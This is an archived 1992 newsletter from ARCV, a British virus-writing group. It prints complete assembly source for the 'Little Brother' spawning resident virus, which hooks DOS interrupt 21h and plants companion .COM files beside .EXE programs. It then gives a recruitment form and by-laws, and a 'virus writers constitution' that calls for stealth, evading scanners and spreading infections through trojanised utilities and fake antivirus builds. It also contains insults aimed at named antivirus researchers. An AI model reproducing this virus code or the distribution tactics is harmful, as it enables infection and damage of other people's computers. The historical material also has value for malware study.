💾 Archived View for jay.scot › files › groups › arcv › newsletter › arcvnews01.txt captured on 2021-12-04 at 18:04:22.
-=-=-=-=-=-=-
The �� ��� ��� � � ���� ���� � � � � � � � �� � ��� � ���� � ����The Association of Really Cruel Viruses.��Ŀ ������������������������������������������������ Welcome to the first ARCV Newsletter.... We hope you are all having a Spiffing Time out there.... First lets introduce the 'Team'. The Keyboard Basher - Apache Warrior. The Other One - ICE-9. Well you may or may not know that we here are one the only Truly English Computer Underground Organisation (And just to piss off the Americans Out there we will spell everything with an 's' not a 'z'). In this and future newsletters we will be dodging Special Branch and New Scotland Yard as we go, as well as putting in the odd virus ASM file, Debug Dump for you all to have fun with. We will also provide information on what's happening (DUDE) out there in Computer Land. Contents. 000..........................................................Contents. 001...................................Virus Spotlight, Little Brother. 002............................................ARCV Application Forms. 003.........................What is The ARCV, and Who are its Members. 004.....................................................Ontario Virus. 005......................................................Sunday Virus. 006...........................................................Closing. The file in the Archive ARCVVIR.COM is a self displaying List of all the ARCV Viruses we have produced. (Requires ANSI.SYS) Greetings...To The Guy Who Wrote CHAOS - Thanks Bud The Guy Who Wrote FU MANCHU - Are you English? Patti 'VSUM' Hoffman - We are here to make your Life HELL! John McAfee - To Think if wasn't for us you'd be Unemployed The Guy Who Wrote MICHELANGELO - Geta LIFE!!!!!!!!!!!!! Terry Pratchett - You Are COOOOOOOOL! And Are Carnivorous Plants Really that Boring? ARCV NEWS 001. - Virus Spotlight - Little Brother. Now this virus, is rather crafty as is relies on good old MSDOS program handling to work, ie. The Fact that .COM files are allways load before .EXE files. First lets see what Patti has to say. Virus Name: Little Brother Aliases: V Status: Rare Discovered: October, 1991 Symptoms: 307 byte .COM files Origin: The Netherlands Eff Length: 307 Bytes Type Code: SRCE - Spawning Resident .EXE Infector Detection Method: ViruScan, AVTK 5.54+, F-Prot 2.03+, Novi 1.1d+ Removal Instructions: Delete infected .COM programs General Comments: The Little Brother virus was submitted from the Netherlands in October, 1991. This virus is a spawning virus similar in technique to the Aids 2 and Twin-351 viruses. The first time a program infected with Little Brother is executed, Little Brother will become memory resident in a "hole" in low system memory in the system data area, hooking interrupt 21. There will be no change in total system or available free memory. Once resident, the Little Brother virus will infect .EXE programs when they are executed. The .EXE program itself will not be altered, but a corresponding .COM program will be created by the virus of 307 bytes. This corresponding.COM program will contain pure virus code and have a date/time stamp in the DOS directory of when it was created. The following text strings can be found in the 307 byte .COM files: "Little Brother" "EXE COM" Since DOS will execute .COM programs before .EXE programs, whenever the user attempts to execute a .EXE program, the corresponding .COM program will be executed first. The .COM program, when finished will then start the .EXE program the user was attempting to execute. Well lets get to the Asm source. --------------------------------------------------------------------------- cseg segment assume cs:cseg,ds:cseg,es:nothing org 100h FILELEN equ quit - begin RESPAR equ (FILELEN/16) + 17 VER_ION equ 1 oi21 equ quit nameptr equ quit+4 DTA equ quit+8 .RADIX 16 ;************************************************************************** ;* Start the program! ;************************************************************************** begin: cld mov ax,0DEDEh ;already installed? int 21h cmp ah,041h je cancel mov ax,0044h ;move program to empty hole mov es,ax mov di,0100h mov si,di mov cx,FILELEN rep movsb mov ds,cx ;get original int21 vector mov si,0084h mov di,offset oi21 movsw movsw push es ;set vector to new handler pop ds mov dx,offset ni21 mov ax,2521h int 21h cancel: ret ;************************************************************************** ;* File-extensions ;************************************************************************** EXE_txt db 'EXE',0 COM_txt db 'COM',0 ;************************************************************************** ;* Interupt handler 24 ;************************************************************************** ni24: mov al,03 iret ;************************************************************************** ;* Interupt handler 21 ;************************************************************************** ni21: pushf cmp ax,0DEDEh ;install-check ? je do_DEDE push dx push bx push ax push ds push es cmp ax,4B00h ;execute ? jne exit doit: call infect exit: pop es pop ds pop ax pop bx pop dx popf jmp dword ptr cs:[oi21] ;call to old int-handler do_DEDE: mov ax,04100h+VER_ION ;return a signature popf iret ;************************************************************************** ;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) ;************************************************************************** infect: cld mov word ptr cs:[nameptr],dx ;save the ptr to the ;filename mov word ptr cs:[nameptr+2],ds push cs ;set new DTA pop ds mov dx,offset DTA mov ah,1Ah int 21 call searchpoint mov si,offset EXE_txt ;is extension 'EXE'? mov cx,3 rep cmpsb jnz do_com do_exe: mov si,offset COM_txt ;change extension to COM call change_ext mov ax,3300h ;get ctrl-break flag int 21 push dx xor dl,dl ;clear the flag mov ax,3301h int 21 mov ax,3524h ;get int24 vector int 21 push bx push es push cs ;set int24 vec to new handler pop ds mov dx,offset ni24 mov ax,2524h int 21 lds dx,dword ptr [nameptr] ;create the file (unique ;name) xor cx,cx mov ah,5Bh int 21 jc return1 xchg bx,ax ;save handle push cs pop ds mov cx,FILELEN ;write the file mov dx,offset begin mov ah,40h int 21 cmp ax,cx pushf mov ah,3Eh ;close the file int 21 popf jz return1 ;all bytes written? lds dx,dword ptr [nameptr] ;delete the file mov ah,41h int 21 return1: pop ds ;restore int24 vector pop dx mov ax,2524h int 21 pop dx ;restore ctrl-break flag mov ax,3301h int 21 mov si,offset EXE_txt ;change extension to EXE call change_ext return: ret do_com: call findfirst ;is the file a virus? cmp word ptr cs:[DTA+1Ah],FILELEN jne return mov si,offset EXE_txt ;does the EXE-variant exist? call change_ext call findfirst jnc return mov si,offset COM_txt ;change extension to COM jmp short change_ext ;************************************************************************** ;* Find the file ;************************************************************************** findfirst: lds dx,dword ptr [nameptr] mov cl,27h mov ah,4Eh int 21 ret ;************************************************************************** ;* change the extension of the filename (CS:SI -> ext) ;************************************************************************** change_ext: call searchpoint push cs pop ds movsw movsw ret ;************************************************************************** ;* search begin of extension ;************************************************************************** searchpoint: les di,dword ptr cs:[nameptr] mov ch,0FFh mov al,'.' repnz scasb ret ;************************************************************************** ;* Text and Signature ;************************************************************************** db 'Little Brother',0 quit: cseg ends end begin Quite a Simple idea for a virus but it works. Apche.ARCV NEWS 002. Well I thought it could be a good idea if I put in the relevant ARCV Application forms for any one who may wish to join the ranks of the ARCV. At the moment we are looking for MAC Virus programmers, and AMIGA Virus Programmers and others. Also we are looking Couriers for the ARCV (BBS's for Distribution), that are based all over the world in Britain, USA and Eastern Europe Mainly but other countries will get equal consideration. so less of the waffle and to the Applications. --------------------------------------------------------------------------- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- /////// //////// ///////// // // // // // // // // // /////// /////// // // // // // // // // // // // // * // // * ///////// * /// THE ASSOCIATION OF REALLY CRUEL VIRUSES -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- The Association of Really Cruel Viruses Courier and/or Membership Application Form For any purpose other than to evaluate this application, the data in all sections of this application shall not be disclosed outside the internal leadership of the ARCV. For more ARCV information please see ARCV prologue. --------------------------------------------------------------------------- FALSE STATEMENT: A person is guilty of False Statement when he/she Intentionally makes a false statement under oath or pursuant to a form bearing Notice. You are here to fore-warned... FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!! --------------------------------------------------------------------------- PART A: Background Information 1. Date of Application:__________________________________ 2. Applicants Name (Last,First,Middle,Maiden): ______________________________________________________ 3. Applicants Current Handle:____________________________ 4. List all other Handles by which you have been known. ______________________________________________________ ______________________________________________________ 5. Residence Address (Number,Street,City or Town,County and Post Code): _______________________________________________________ _______________________________________________________ _______________________________________________________ 6. Home Telephone Number (Area Code and Number): _______________________________________________________ 7. Home Data Number (Area Code and Number): _______________________________________________________ 8. Fidonet Contact address (full address, including name to contact): _______________________________________________________ _______________________________________________________ 9. Age:__________ Date of Birth:_________________________ 10. Marital Status: ___ Married ___ Separated ___ Single ___ Divorced 11. Nationality __________________________________________ 12. Have you at any time used a virus? YES/NO ____________ If Yes, explain: _____________________________________ ______________________________________________________ ______________________________________________________ 13. Have you at any time been the victim of a virus attack? YES/NO _________________ If yes, explain: _____________________________________ ______________________________________________________ ______________________________________________________ Part B: Legal Information 1. Have You ever been convicted in any court of a crime punishable by imprisonment for a term exceeding 1 year? No _____ Yes ____ If yes, explain: _____________________________ _______________________________________________________ _______________________________________________________ 2. Are you currently on Probation,Parole,a Work-Release Program or Released on Personal Recognizance or Bond Pending Court Action? No _____ Yes ____ If yes, explain: ______________________________ _______________________________________________________ _______________________________________________________ 3. Are you Now or ever have been a member of any form of Law Enforcement Agency, Such as: FBI,Secret Service,NSA, CIA,BATF,State or Local Police,Special Branch etc.? No _____ Yes ____ If yes, explain: _____________________________ _______________________________________________________ _______________________________________________________ 4. Are you Now or ever have been a member of any form of group that investigates the Computer Underground? Such as: Software Publishers Association,etc. No _____ Yes ____ If yes, explain: _____________________________ _______________________________________________________ _______________________________________________________ 5. Do you belong To any Organized Computer Club or Group? No _____ Yes ____ If yes, explain: _____________________________ _______________________________________________________ _______________________________________________________ Part C: ARCV Information 1. Are you applying to be: An ARCV Member __________ An ARCV Courier __________ Both __________ 2. If applying to be a member, Explain in detail your reason for wanting to be a member of the ARCV. _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ 3. What kind of position do you wish to hold in the ARCV? ____________________________________________________________________ ____________________________________________________________________ ____________________________________________________________________ Part D: Qualifications 1. Which Programming languages do you know WELL? (Place X in Boxes) [ ] Assembler [ ] Basic [ ] Cobol [ ] C (Turbo, Ansi) [ ] Fortran [ ] Pascal (Turbo, Others) 2. Which Programming languages are you familiar which (Place x in Boxes) [ ] Assembler [ ] Basic [ ] Cobol [ ] C (Turbo, Ansi) [ ] Fortran [ ] Pascal (Turbo, Others) 3. Have you ever written a virus? (No Trojans Please) No _______ Yes ______ If yes, explain: ___________________________ _______________________________________________________ _______________________________________________________ _______________________________________________________ 4. If you answered NO to the above DON'T answer this... Has the virus you've written in the Public Domain? (ie. Is it released?) No _______ Yes ______ If yes, explain: ___________________________ _______________________________________________________ _______________________________________________________ _______________________________________________________ 5. If you've written a virus are you willing for it to be placed in our virus library? No _______ Yes ______ 6. Do you have a virus collection? No _______ Yes ______ If yes, explain (Please included number in collection) _______________________________________________________ _______________________________________________________ _______________________________________________________ ________________________________________________________ ARCV By-Laws: --------------------------------------------------------------------------- Section 1A-1 ALL MEMBERS OF THE ARCV MUST SUBSCRIBE TO THE HACKERS ETHIC AS DEFINED BY THE EARLY CRAFTERS OF THE ART. (See Appendix A) ALSO YOU MUST SUBSCRIBE TO THE VIRUS WRITERS CONSTITUTION. (See Appendix B) --------------------------------------------------------------------------- Section 1a-2 DEFENSE OF COPARTICIPANTS IN OFFENSE WITH A COMPUTER In any prosecution for any Crime under Law, in which the member was not the only participant, it shall be recognized that no ARCV member shall provide information on any current ARCV member to any member of the Media or Law Enforcement Agencies. --------------------------------------------------------------------------- Section 1a-3 USE OF DEADLY HACKING FORCE Except as provided in these sub-sections, No ARCV member shall ever damage delete or in any way tamper with a computer network or system. Exception 1a-3-1 : Any BBS or system posting or providing Anti-ARCV propaganda may be crashed or deleted. Exception 1a-3-2 : Any BBS or system posting or providing any ARCV members phone numbers,Password, or personal information may be crashed or deleted. Exception 1a-3-3 : Any system so approved by the ARCV Council. --------------------------------------------------------------------------- Section 1a-4 DISCLOSURE OF PROPRIETARY INFORMATION No ARCV member shall distribute confidential ARCV information. This shall include: Disks,Programs,Files,Passwords or Codes,Paperwork, Manuals,Documents to any Non ARCV member,Media Member, or Law Enforcement Agency, Without the prior permission of the ARCV Council. --------------------------------------------------------------------------- Section 1a-5 CONTRIBUTION OF INFORMATION All ARCV Members are expected to contribute to the ARCV as a whole, and to provide information obtained on their own. Members shall not just use information provided by other members or non-members. --------------------------------------------------------------------------- Section 1a-6 DISCLOSURE OF MEMBERSHIP All ARCV members will not allow any Non-member to use his/her password, ID,Handle or name. And No member shall post or provide any members name password or phone number on any computer system without the prior consent of said member. All members will leave his/her name or phone number on a system or network at their own discretion and risk. --------------------------------------------------------------------------- APPENDIX A: 1. All Information should be FREE! 2. Promote Decentralization - Mistrust Authority 3. Access to computers should be unlimited and Total 4. Hackers should be judged by their hacking ability 5. You can create art and beauty on a computer 6. Computers can change your life for the better. ___________________________________________________________________________ APPENDIX B: *** ������������������������������������������� The Constitution of Worldwide Virus Writers ������������������������������������������� Initial Release - February 12, 1992 ������������������������������������������� ARTICLE I - REGARDING ORIGINAL VIRII Section A - DEFINITION The term "original virus" herein indicates programming done exclusively by either one individual or group, with no code taken from any other source, be it a book or another virus. Section B - CODE REQUIREMENTS For an original virus to conform to the standards set by this document, it must include the following: 1) The title of the virus in square brackets followed by a zero byte should be in the code, in a form suitable for inclusion into SCAN(1). This is to ensure that the name of the virus is known to those examining it. 2) The name of the author and his/her group affiliation/s should be included in the code, followed by a zero byte. At the present, this is an optional requirement. 3) Some form of encryption or other form of stealth techniques must be used. Even a simple XOR routine will suffice. 4) If the virus infects files, the code should be able to handle infection of read only files. 5) It must have some feature to distinguish it from other virii. Creativity is encouraged above all else. 6) The virus must not be detectable by SCAN. Section C - IMPLEMENTATION This section, and all sections hereafter bearing the heading "IMPLEMENTATION" refer to the recommended method of implementation of the suggestions/requirements listed in the current article. 1) Virus_Name db '[Avocado]',0 2) Author db 'Dark Angel, PHALCON/SKISM',0 ARTICLE II - REGARDING "HACKED" VIRII Section A - DEFINITION The term "hacked virus" herein refers to any virus written by either one individual or a group which includes code taken from any other source, be it a book, a code fragment, or the entire source code from another virus. The term "source virus" herein refers to the virus which spawned the "hacked virus." Section B - CODE REQUIREMENTS For a "hacked" virus to conform to the standards set forth by this document, it must include the following, in addition to all the requirements set down in Article I of this document: 1) The title, author (if available), and affiliation of the author (if available) of the original virus. 2) The author of the hacked virus must give the source code of said virus to the author of the source virus upon demand. 3) No more Jerusalem, Burger, Vienna, Stoned, and Dark Avenger hacks are to be written. 4) The source virus must be improved in some manner (generally in efficiency of speed or size). 5) The hacked virus must significantly differ from the source virus, i.e. it cannot be simply a text change. Section C - IMPLEMENTATION 1) Credit db 'Source stolen from Avocado by Dark Angel of PHALCON/SKISM',0 ARTICLE III - REGARDING VIRAL STRAINS Section A - DEFINITION The term "viral strain" herein refers to any virus written by the original author which does not significantly differ from the original. It generally implies a shrinking in code size, although this is not required. Section B - CODE REQUIREMENTS For a "viral strain" to conform to the standards set by this document, it must include the following, in addition to all the requirements set down in Article I of this document: 1) The name of the virus shall be denoted by the name of the original virus followed by a dash and the version letter. 2) The name of the virus must not change from that of the original strain. 3) A maximum of two strains of the virus can be written. Section C - IMPLEMENTATION 1) Virus_Name db '[Avocado-B]',0 ARTICLE IV - DISTRIBUTION Section A - DEFINITION The term "distribution" herein refers to the transport of the virus through an infected file to the medium of storage of a third (unwitting) party. Section B - INFECTION MEDIUM The distributor shall infect a file with the virus before uploading. Suggested files include: 1) Newly released utility programs. 2) "Hacked" versions of popular anti-viral software, i.e. the version number should be changed, but little else. 3) Beta versions of any program. The infected file, which must actually do something useful, will then be uploaded to a board. The following boards are fair game: 1) PD Boards 2) Lamer boards 3) Boards where the sysop is a dick No virus shall ever be uploaded, especially by the author, directly to an antivirus board, such as HomeBase or Excalibur. Section C - BINARY AND SOURCE CODE AVAILABILITY The binary of the virus shall not be made available until at least two weeks after the initial (illicit) distribution of the virus. Further, the source code, which need not be made available, cannot be released until the latest version of SCAN detects the virus. The source code, should it be made available, should be written in English. Section D - DOCUMENTATION Documentation can be included with the archive containing the binary of the virus, although this is optional. The author should include information about the virus suitable for inclusion in the header of VSUM(2). A simple description will follow, though the author need not reveal any "hidden features" of the virus. Note this serves two purposes: 1) Enable others to effectively spread the virus without fear of self-infection. 2) Ensure that your virus gets a proper listing in VSUM. ARTICLE V - AMENDMENTS Section A - PROCEDURE To propose an amendment, you must first contact a PHALCON/SKISM member through one of our member boards. Leave a message to one of us explaining the proposed change. It will then be considered for inclusion. A new copy of the Constitution will then be drafted and placed on member boards under the filename "PS-CONST.TXT" available for free download by all virus writers. Additionally, an updated version of the constitution will be published periodically in our newsletter. Section B - AMENDMENTS None as of this writing. ARTICLE VI - MISCELLANEOUS Section A - WHO YOU CAN MAKE FUN OF This is a list of people who, over the past few years, have proved themselves to be inept and open to ridicule. 1) Ross M. Greenberg, author of FluShot+ 2) Patricia (What's VSUM?) Hoffman. 2) People who post "I am infected by Jerusalem, what do I do?" or "I have 20 virii, let's trade!" 3) People who don't know the difference between a virus and a trojan. 4) Lamers and "microwares puppies" Section B - WHO YOU SHOULDN'T DIS TOO BADLY This is a list of people who, over the past few years, have proved themselves to be somewhat less inept and open to ridicule than most. 1) John McAfee, nonauthor of SCAN 2) Dennis, true author of SCAN Section C - MOTIVATION In most cases, the motivation for writing a virus should not be the pleasure of seeing someone else's system trashed, but to test one's programming abilities. ���������� 1 SCAN is a registered trademark of McAfee Associates. 2 VSUM is a registered trademark of that bitch who doesn't know her own name. ___________________________________________________________________________ For those applying for courier membership if we feel you are suitable we will be in touch to discus the extra details. The usual first contact will be by means of a Fidonet address or a written letter. For those applying for normal membership then will contact you at your Fidonet address, with the extra details of the membership and a list of board that's we can be contacted through. ___________________________________________________________________________ FALSE STATEMENT: A person is guilty of False Statement when he/she Intentionally makes a false statement under oath or pursuant to a form bearing Notice. You are here to fore-warned... FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!! I agree to the By-Laws and statements put forth on this document NAME: _______________________________ DATE: _______________________________ To return your Application please return to Apache Warrior. Through E- Mail on any Flashback BBS or the BBS where you got this from. Please fill in the Machine Configuration data sheet and return to the above address.